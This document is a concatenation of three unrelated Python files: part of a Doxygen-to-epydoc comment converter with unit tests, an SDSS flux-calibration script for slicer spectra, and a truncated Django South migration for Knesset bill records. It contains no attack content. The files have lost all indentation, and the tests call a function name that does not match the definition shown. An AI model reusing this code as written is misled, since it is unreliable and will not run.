"includelineno",
"ingroup",
"internal",
"invariant",
"interface",
"latexonly",
"li",
"line",
"link",
"mainpage",
"manonly",
"memberof",
"msc",
# "n",
"name",
"namespace",
"nosubgrouping",
"note",
"overload",
# "p",
"package",
"page",
# "par",
"paragraph",
# "param",
"post",
"pre",
# "private (PHP only)",
# "privatesection (PHP only)",
"property",
# "protected (PHP only)",
# "protectedsection (PHP only)",
"protocol",
# "public (PHP only)",
# "publicsection (PHP only)",
# "ref",
"relates",
"relatesalso",
"remarks",
"return",
"retval",
"sa",
"section",
"see",
"showinitializer",
"since",
"skip",
"skipline",
"struct",
"subpage",
"subsection",
"subsubsection",
"test",
"throw",
("todo","TODO"),
"tparam",
"typedef",
"union",
"until",
"var",
"verbatim",
"verbinclude",
"version",
"warning",
"weakgroup",
"xmlonly",
"xrefitem",
# "$",
# "@",
# "\",
# "&",
# "~",
# "<",
# ">",
# "#",
# "%",
]
for command in replacement_list:
try:
old,new = command
except ValueError:
old = command
new = command.capitalize()+":"
tmp_str = clean(tmp_str, "@"+old, new)
tmp_str = clean(tmp_str, "\\"+old, new)
# Replace any remaining unescaped backslashes with an escaped backslash
tmp_str = re.sub(r'([^\\])\\([^\\])', r'\1\\\\\2', tmp_str)
return tmp_str
#clean_str()
#class doxygen_doc_extractor# Category 3 of doxygen comments, (only) on the same line as item being documented
# e.g. int foo; //!< foo is an integer...
# can start with "//!", "///" or "/**"
dox3a_re = re.compile(r'//[!/]<(.*)') # "//!" or "///"
dox3b_re = re.compile(r'/\*\*<(.*)\*/') # "/**<", ended by "*/"
def extract_same_line_doc(line):
m = dox3a_re.search(line)
if m:
return m.group(1)
m = dox3b_re.search(line)
if m:
return m.group(1)
return None
dox_end1_re = re.compile(r'^\s*///.*$') # anything starting with "///"
dox_end2_re = re.compile(r'^\s*/\*[!*].*\*/\s*$') # One line comment "/** whatever */"
dox_end3_re = re.compile(r'.*\*/\s*$') # end of multiline doxygen comment "whatever */"
one_line_comment_re = re.compile(r'^.*/\*.*\*/.*$') # anything with a one line "/* whatever */" comment
def might_be_doxygen_comment_end_line(line):
if dox_end1_re.match(line):
return True
if dox_end2_re.match(line):
return True
if dox_end3_re.match(line):
if not one_line_comment_re.match(line):
return True
return False
def is_blank_line(line):
if line.strip() == "":
return True
return False
def clean(str, old, new=""):
"This is the best I could figure for missing clean() function --cmb"
if not str:
return ""
return str.replace(old, new)
def is_cpp_comment_line(line):
"whether line is a c++ style doxygen comment"
if line.lstrip().startswith("///"):
return True
if line.lstrip().startswith("//!"):
return True
return False
def is_c_end_comment(line):
"Line ends, but does not begin, a c-style comment"
if not line.rstrip().endswith("*/"):
return False
if line.find("/*") >= 0:
return False
return True
def is_oneline_c_comment(line):
if not line.rstrip().endswith("*/"):
return False
if line.lstrip().startswith("/**"):
return True
if line.lstrip().startswith("/*!"):
return True
return False
def is_c_start_comment(line):
if line.rstrip().endswith("*/"):
return False # want start only, with no end
if line.lstrip().startswith("/**"):
return True
if line.lstrip().startswith("/*!"):
return True
return False
def is_c_nondoxygen_start_comment(line):
if line.lstrip().startswith("/*"):
return True
return False
class TestDocExtractor(unittest.TestCase):
def test_clear(self):
self.assertEqual(clear_str(r" /* f"), " f")
self.assertEqual(clear_str(r" f"), " f")
self.assertEqual(clear_str(r" f */"), " f")
self.assertEqual(clear_str(r" \brief f "), " f")
self.assertEqual(
clear_str(r" @param foo desc f"),
r" @param foo: desc f") # epydoc format
self.assertEqual(
clear_str(r" \param foo desc f"),
r" @param foo: desc f") # epydoc format
self.assertEqual(
clear_str(r" @param foo: desc f"),
r" @param foo: desc f") # epydoc input should remain unchanged
self.assertEqual(
clear_str(r" the \p foo parameter"),
r" the L{foo} parameter")
self.assertEqual( # clear trailing newlines
clear_str(" foo \n"),
r" foo")
# convert html list to epydoc list
self.assertEqual(
clear_str(" <li>foo</li>"),
r" - foo")
# convert doxygen \par to epydoc sections
self.assertEqual(
clear_str(r" \par Theory:"),
" Theory:\n -------")
def test_finalize(self):
ex = doxygen_doc_extractor()
ex.declaration = ""
self.assertEqual(ex.finalize_doc_lines(["f"]), '"f"')
self.assertEqual(ex.finalize_doc_lines(["", "f", ""]), '"f"')
self.assertEqual(ex.finalize_doc_lines(
["", "f", "g", ""]),
r'"f\ng"')
self.assertEqual(ex.finalize_doc_lines(
["", "f", " g", ""]),
r'"f\n g"')
if __name__ == "__main__":
unittest.main()
|
|
"""
This script can be used to flux calibrate an image slicer 2D spectra to SDSS one (of the same target).
Matches the slit width to SDSS fiber, takes into account the difference in area covered
using a boosting factor and fractional pixels.
.. Warning:: On should only fit the observed spectrum that has been recorded at the same place
as the SDSS spectrum. Otherwise the fitting will artificially throw the flux
calibration off.
:requires: PyfITS
:requires: NumPy
:requires: SciPy
:requires: matplotlib
:requires: SamPy
:author: Sami-Matias Niemi
:contact: sniemi@unc.edu
:version: 0.5
"""
import os, sys, datetime
import ConfigParser
from optparse import OptionParser
import pyfits as pf
import numpy as np
import scipy.ndimage.filters as filt
import scipy.interpolate as interpolate
from matplotlib import pyplot as plt
import SamPy.fits.basics as basics
import SamPy.fitting.fits as ff
import SamPy.image.manipulation as m
class calibrateToSDSS():
"""
This class can be used to flux calibrate an image
slicer 2D spectra to SDSS one (of the same target).
"""
def __init__(self, configfile, debug, section='DEFAULT'):
"""
Class constructor.
:param configfile: name of the configuration file
:type configfile: string
:param debug: whether ot output debugging information or not
:type debug: boolean
:param section: configure file section to read
:type section: string
"""
self.configfile = configfile
self.section = section
self.debug = debug
self.fitting = {}
def _readConfigs(self):
"""
Reads in the config file information using configParser.
"""
self.config = ConfigParser.RawConfigParser()
self.config.readfp(open(self.configfile))
def _processConfigs(self):
"""
Processes configuration information read by the __readConfigs method and produces a dictionary describing slits.
"""
self.fitting['sigma'] = self.config.getfloat(self.section, 'sigma')
self.fitting['ycenter'] = self.config.getint(self.section, 'ycenter')
self.fitting['width'] = self.config.getfloat(self.section, 'width')
self.fitting['platescale'] = self.config.getfloat(self.section, 'platescale')
self.fitting['binning'] = self.config.getint(self.section, 'binning')
self.fitting['FiberDiameter'] = self.config.getfloat(self.section, 'fiberDiameter')
self.fitting['sdss'] = self.config.get(self.section, 'SDSSspectrum')
self.fitting['observed'] = self.config.get(self.section, 'observedspectrum')
self.fitting['order'] = self.config.getint(self.section, 'order')
names = list(self.config.get(self.section, 'update').strip().split(','))
self.fitting['update'] = [name.strip() for name in names]
if self.debug:
print '\nConfiguration parameters:'
print self.fitting
def _loadData(self):
"""
Loads the FITS files using PyFITS and converts the SDSS flux to flux units.
"""
self.fitting['sdssData'] = pf.open(self.fitting['sdss'])[1].data
self.fitting['SDSSflux'] = self.fitting['sdssData']['FLUX']*1e-17
self.fitting['SDSSwave'] = self.fitting['sdssData']['WAVELENGTH']
self.fitting['obsData'] = pf.open(self.fitting['observed'])[0].data
self.fitting['obsHeader'] = pf.open(self.fitting['observed'])[0].header
def _calculateArea(self):
"""
Calculates the fiber area and the ratio of the fiber to slit area.
Calculates the number of pixels around the center that should be included.
Calculates also the fraction that the full pixels do not cover to be used
later to take into account the "missing flux".
"""
self.fitting['FiberArea'] = np.pi*(self.fitting['FiberDiameter'] / 2.)**2
self.fitting['slitPixels'] = self.fitting['FiberDiameter'] / \
self.fitting['platescale'] / \
self.fitting['binning']
self.fitting['slitPix2'] = int(np.floor((self.fitting['slitPixels'] - 1.0) / 2.))
self.fitting['slitPixFractional'] = self.fitting['slitPixels'] - (2*self.fitting['slitPix2'] + 1.)
self.fitting['boosting'] = self.fitting['FiberArea'] / \
(self.fitting['width'] * self.fitting['slitPixels'])
def _deriveObservedSpectra(self):
"""
Derives a 1D spectrum from the 2D input data.
Sums the pixels around the centre of the continuum that match to the SDSS fiber size.
Multiplies the flux in the pixels next to the last full ones to include with the
fractional flux we would otherwise be "missing".
"""
#y center and how many full pixels on either side we can include that would still
#be within the SDSS fiber
y = self.fitting['ycenter']
ymod = self.fitting['slitPix2']
#modify the lines of the fractional pixel information
self.fitting['obsData'][y+ymod+1, :] *= (self.fitting['slitPixFractional'] / 2.)
self.fitting['obsData'][y-ymod-1, :] *= (self.fitting['slitPixFractional'] / 2.)
#sum the flux
self.fitting['obsSpectrum'] = np.sum(self.fitting['obsData'][y-ymod-1:y+ymod+2, :], axis=0) / \
self.fitting['boosting']
#match the resolution, i.e. convolve the observed spectrum with a Gaussian
self.fitting['obsSpectraConvolved'] = filt.gaussian_filter1d(self.fitting['obsSpectrum'],
self.fitting['sigma'])
#get a wavelength scale
self.fitting['obsWavelengths'] = basics.getWavelengths(self.fitting['observed'],
len(self.fitting['obsSpectraConvolved']))
def _calculateDifference(self):
"""
Calculates the difference between the derived observed and SDSS spectra.
Interpolates the SDSS spectra to the same wavelength scale.
.. Warning:: We do not conserve flux here when interpolating. This is because
we do not actually interpolate flux but flux density which is per
angstrom.
"""
ms = (self.fitting['SDSSwave'] >= np.min(self.fitting['obsWavelengths'])) &\
(self.fitting['SDSSwave'] <= np.max(self.fitting['obsWavelengths']))
newflux = m.frebin(self.fitting['SDSSflux'][ms],
len(self.fitting['obsSpectraConvolved']))#, total=True)
self.fitting['spectraRatio'] = self.fitting['obsSpectraConvolved'] / newflux
self.fitting['interpFlux'] = newflux
def _generateMask(self):
"""
Generates a mask in which Halpha and some other lines have been masked out.
:todo: The masking out regions has been hardcoded. This should be changed, as
now depending on the redshift of the galaxy the masking region may not
fully cover the feature.
"""
#TODO: remove the hardcoded lines
halph = [6660, 6757]
msk = ~((self.fitting['obsWavelengths'] >= halph[0]) & (self.fitting['obsWavelengths'] <= halph[1])) & \
~((self.fitting['obsWavelengths'] >= 6000) & (self.fitting['obsWavelengths'] <= 6040)) & \
~((self.fitting['obsWavelengths'] >= 6030) & (self.fitting['obsWavelengths'] <= 6070))
self.fitting['mask'] = msk
def _fitSmoothFunction(self):
"""
Fits a smooth function to the spectra ratio.
Uses the NumPy polyfit to do the fitting.
"""
fx = np.poly1d(np.polyfit(self.fitting['obsWavelengths'][self.fitting['mask']],
self.fitting['spectraRatio'][self.fitting['mask']],
self.fitting['order']))
self.fitting['fit'] = fx(self.fitting['obsWavelengths'])
if self.debug:
print '\nFitting parameters:'
print fx
def _generatePlots(self):
"""
Generate some plots showing the fit and the spectra.
These plots are not crucial but rather a convenience when
inspecting whether the derived fit was reasonable and how
much the flux values have been modified.
"""
#first
fig = plt.figure()
ax = fig.add_subplot(111)
ax.plot(self.fitting['SDSSwave'], self.fitting['SDSSflux'], label='SDSS')
ax.plot(self.fitting['obsWavelengths'][self.fitting['mask']],
self.fitting['obsSpectraConvolved'][self.fitting['mask']],
label='Convolved and Masked')
ax.plot(self.fitting['obsWavelengths'],
self.fitting['obsSpectrum']/self.fitting['fit'],
label='Fitted Spectra')
ax.set_ylabel('Flux [erg/cm**2/s/AA]')
ax.set_xlabel('Wavelength [AA]')
ax.set_xlim(3800, 9200)
plt.legend(shadow=True, fancybox=True)
plt.savefig('Spectra.pdf')
ax.set_xlim(5450, 6950)
plt.savefig('SpectraZoomed.pdf')
plt.close()
#second
fig = plt.figure()
ax = fig.add_subplot(111)
ax.scatter(self.fitting['obsWavelengths'][self.fitting['mask']],
self.fitting['spectraRatio'][self.fitting['mask']], s = 2,
label = 'Observed Spectra / SDSS (masked)')
ax.plot(self.fitting['obsWavelengths'], self.fitting['fit'], 'r-',
label = 'Fit')
#ax.plot(self.fitting['obsWavelengths'], self.fitting['fit2'], 'g-',
# label = 'Fit2')
ax.set_ylabel('Ratio')
ax.set_xlabel('Wavelength [AA]')
plt.legend(shadow=True, fancybox=True, numpoints=1)
plt.savefig('Fitting.pdf')
plt.close()
def _outputSensitivity(self):
"""
Outputs the sensitivity function to an ascii file. This file can be used later
for other calibrations if needed.
"""
fh = open('sensitivity.txt', 'w')
fh.write('#Wavelength sensitivity\n')
for a, b in zip(self.fitting['obsWavelengths'], self.fitting['fit']):
fh.write(str(a) + ' ' + str(b) + '\n')
fh.close()
def _updateFITSfiles(self):
"""
Updates the FITS files that were given in the configuration file with the derived flux factor.
Interpolates the fitted ratio function if the wavelength scale of the file
to be updated is different.
"""
#must interpolate the fitted function to right wavelength scale
interp = interpolate.interp1d(self.fitting['obsWavelengths'], self.fitting['fit'])
#loop over the files to be updated.
for file in self.fitting['update']:
fh = pf.open(file)
hdu = fh[0].header
data = fh[0].data
ft = interp(basics.getWavelengths(file, len(data[0,:])))
for i, line in enumerate(data):
data[i, :] = line / ft
new = file.split('.fits')[0] + 'senscalib.fits'
hdu.add_history('Original File: %s' % file)
hdu.add_history('Pixel values modified by fluxCalibrateToSDSS.py (SMN)')
hdu.add_history('Updated: %s' % datetime.datetime.isoformat(datetime.datetime.now()))
if os.path.isfile(new):
os.remove(new)
fh.writeto(new, output_verify='ignore')
fh.close()
if self.debug:
print '\nFile %s updated and saved as %s' % (file, new)
def run(self):
"""
Driver function that should be called if all steps of the class should be performed.
"""
self._readConfigs()
self._processConfigs()
self._loadData()
self._calculateArea()
self._deriveObservedSpectra()
self._calculateDifference()
self._generateMask()
self._fitSmoothFunction()
self._generatePlots()
self._outputSensitivity()
self._updateFITSfiles()
def processArgs(printHelp=False):
"""
Processes command line arguments.
"""
parser = OptionParser()
parser.add_option('-c', '--configfile', dest='configfile',
help="Name of the configuration file", metavar="string")
parser.add_option('-s', '--section', dest='section',
help="Name of the section of the config file", metavar="string")
parser.add_option('-d', '--debug', dest='debug', action='store_true',
help='Debugging mode on')
if printHelp:
parser.print_help()
else:
return parser.parse_args()
if __name__ == '__main__':
#the script starts here
opts, args = processArgs()
if opts.configfile is None:
processArgs(True)
sys.exit(1)
if opts.section is None:
calibrate = calibrateToSDSS(opts.configfile, opts.debug)
else:
calibrate = calibrateToSDSS(opts.configfile, opts.debug, opts.section)
calibrate.run()
|
|
# encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Bill'
db.create_table('laws_bill', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('title', self.gf('django.db.models.fields.CharField')(max_length=1000)),
('law', self.gf('django.db.models.fields.related.ForeignKey')(blank=True, related_name='bills', null=True, to=orm['laws.Law'])),
('stage', self.gf('django.db.models.fields.CharField')(max_length=10)),
('stage_date', self.gf('django.db.models.fields.DateField')(null=True, blank=True)),
('knesset_proposal', self.gf('django.db.models.fields.related.ForeignKey')(blank=True, related_name='bills', null=True, to=orm['laws.KnessetProposal'])),
('first_vote', self.gf('django.db.models.fields.related.ForeignKey')(blank=True, related_name='bills_first', null=True, to=orm['laws.Vote'])),
('approval_vote', self.gf('django.db.models.fields.related.OneToOneField')(blank=True, related_name='bill_approved', unique=True, null=True, to=orm['laws.Vote'])),
))
db.send_create_signal('laws', ['Bill'])
# Adding M2M table for field proposals on 'Bill'
db.create_table('laws_bill_proposals', (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('bill', models.ForeignKey(orm['laws.bill'], null=False)),
('privateproposal', models.ForeignKey(orm['laws.privateproposal'], null=False))
))
db.create_unique('laws_bill_proposals', ['bill_id', 'privateproposal_id'])
# Adding M2M table for field pre_votes on 'Bill'
db.create_table('laws_bill_pre_votes', (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('bill', models.ForeignKey(orm['laws.bill'], null=False)),
('vote', models.ForeignKey(orm['laws.vote'], null=False))
))
db.create_unique('laws_bill_pre_votes', ['bill_id', 'vote_id'])
# Adding M2M table for field first_committee_meetings on 'Bill'
db.create_table('laws_bill_first_committee_meetings', (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('bill', models.ForeignKey(orm['laws.bill'], null=False)),
('committeemeeting', models.ForeignKey(orm['committees.committeemeeting'], null=False))
))
db.create_unique('laws_bill_first_committee_meetings', ['bill_id', 'committeemeeting_id'])
# Adding M2M table for field second_committee_meetings on 'Bill'
db.create_table('laws_bill_second_committee_meetings', (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('bill', models.ForeignKey(orm['laws.bill'], null=False)),
('committeemeeting', models.ForeignKey(orm['committees.committeemeeting'], null=False))
))
db.create_unique('laws_bill_second_committee_meetings', ['bill_id', 'committeemeeting_id'])
# Adding M2M table for field proposers on 'Bill'
db.create_table('laws_bill_proposers', (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('bill', models.ForeignKey(orm['laws.bill'], null=False)),
('member', models.ForeignKey(orm['mks.member'], null=False))
))
db.create_unique('laws_bill_proposers', ['bill_id', 'member_id'])
def backwards(self, orm):
# Deleting model 'Bill'
db.delete_table('laws_bill')
# Removing M2M table for field proposals on 'Bill'
db.delete_table('laws_bill_proposals')
# Removing M2M table for field pre_votes on 'Bill'
db.delete_table('laws_bill_pre_votes')
# Removing M2M table for field first_committee_meetings on 'Bill'
db.delete_table('laws_bill_first_committee_meetings')
# Removing M2M table for field second_committee_meetings on 'Bill'
db.delete_table('laws_bill_second_committee_meetings')
# Removing M2M table for field proposers on 'Bill'
db.delete_table('laws_bill_proposers')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'blank': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'committees.committee': {
'Meta': {'object_name': 'Committee'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'members': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'committees'", 'symmetrical': 'False', 'to': "orm['mks.Member']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '256'})
},
'committees.committeemeeting': {
'Meta': {'object_name': 'CommitteeMeeting'},
'committee': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['committees.Committee']"}),
'date': ('django.db.models.fields.DateField', [], {}),
'date_string': ('django.db.models.fields.CharField', [], {'max_length': '256'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'mks_attended': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'committee_meetings'", 'symmetrical': 'False', 'to': "orm['mks.Member']"}),
'protocol_text': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'topics': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'votes_mentioned': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'committee_meetings'", 'blank': 'True', 'to': "orm['laws.Vote']"})
},
'contenttypes.contenttype': {
'Meta': {'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'laws.bill': {
'Meta': {'object_name': 'Bill'},
'approval_vote': ('django.db.models.fields.related.OneToOneField', [], {'blank': 'True', 'related_name': "'bill_approved'", 'unique': 'True', 'null': 'True', 'to': "orm['laws.Vote']"}),
'first_committee_meetings': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'bills_first'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['committees.CommitteeMeeting']"}),
'first_vote': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'bills_first'", 'null': 'True', 'to': "orm['laws.Vote']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'knesset_proposal': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'bills'", 'null': 'True', 'to': "orm['laws.KnessetProposal']"}),
'law': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'bills'", 'null': 'True', 'to': "orm['laws.Law']"}),
'pre_votes': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'bills_pre_votes'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['laws.Vote']"}),
'proposals': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'bills'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['laws.PrivateProposal']"}),
'proposers': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'bills'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['mks.Member']"}),
'second_committee_meetings': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'bills_second'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['committees.CommitteeMeeting']"}),
'stage': ('django.db.models.fields.CharField', [], {'max_length': '10'}),
'stage_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '1000'})
},
'laws.knessetproposal': {
'Meta': {'object_name': 'KnessetProposal'},
'booklet_number': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'committee': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'bills'", 'null': 'True', 'to': "orm['committees.Committee']"}),
'committee_meetings': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'laws_knessetproposal_related'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['committees.CommitteeMeeting']"}),
'date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'knesset_id': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'law': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'laws_knessetproposal_related'", 'null': 'True', 'to': "orm['laws.Law']"}),
'originals': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'knesset_proposals'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['laws.PrivateProposal']"}),
'source_url': ('django.db.models.fields.URLField', [], {'max_length': '1024', 'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '1000'}),
'votes': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'laws_knessetproposal_related'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['laws.Vote']"})
},
'laws.law': {
'Meta': {'object_name': 'Law'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '1000'})
},
'laws.membervotingstatistics': {
'Meta': {'object_name': 'MemberVotingStatistics'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'member': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "'voting_statistics'", 'unique': 'True', 'to': "orm['mks.Member']"})
},
'laws.partyvotingstatistics': {
'Meta': {'object_name': 'PartyVotingStatistics'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'party': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "'voting_statistics'", 'unique': 'True', 'to': "orm['mks.Party']"})
},
'laws.privateproposal': {
'Meta': {'object_name': 'PrivateProposal'},
'committee_meetings': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'laws_privateproposal_related'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['committees.CommitteeMeeting']"}),
'date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'joiners': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'bills_joined'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['mks.Member']"}),
'knesset_id': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'law': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'laws_privateproposal_related'", 'null': 'True', 'to': "orm['laws.Law']"}),
'proposal_id': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'proposers': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'bills_proposed'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['mks.Member']"}),
'source_url': ('django.db.models.fields.URLField', [], {'max_length': '1024', 'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '1000'}),
'votes': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'laws_privateproposal_related'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['laws.Vote']"})
},
'laws.vote': {
'Meta': {'object_name': 'Vote'},
'against_party': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'controversy': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'full_text': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'full_text_url': ('django.db.models.fields.URLField', [], {'max_length': '1024', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'importance': ('django.db.models.fields.FloatField', [], {}),
'meeting_number': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'src_id': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'src_url': ('django.db.models.fields.URLField', [], {'max_length': '1024', 'null': 'True', 'blank': 'True'}),
'summary': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'time': ('django.db.models.fields.DateTimeField', [], {}),
'time_string': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '1000'}),
'vote_number': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'votes': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'votes'", 'blank': 'True', 'through': "orm['laws.VoteAction']", 'to': "orm['mks.Member']"}),
'votes_count': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'})
},
'laws.voteaction': {
'Meta': {'object_name': 'VoteAction'},
'against_coalition': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'against_opposition': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'against_party': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'member': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['mks.Member']"}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '10'}),
'vote': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['laws.Vote']"})
},
'mks.member': {
'Meta': {'object_name': 'Member'},
'area_of_residence': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'blog': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['planet.Blog']", 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'current_party': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'members'", 'null': 'True', 'to': "orm['mks.Party']"}),
'date_of_birth': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'date_of_death': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'null': 'True', 'blank': 'True'}),
'end_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'family_status': ('django.db.models.fields.CharField', [], {'max_length': '10', 'null': 'True', 'blank': 'True'}),
'fax': ('django.db.models.fields.CharField', [], {'max_length': '20', 'null': 'True', 'blank': 'True'}),
'gender': ('django.db.models.fields.CharField', [], {'max_length': '1', 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'img_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'is_current': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'blank': 'True'}),
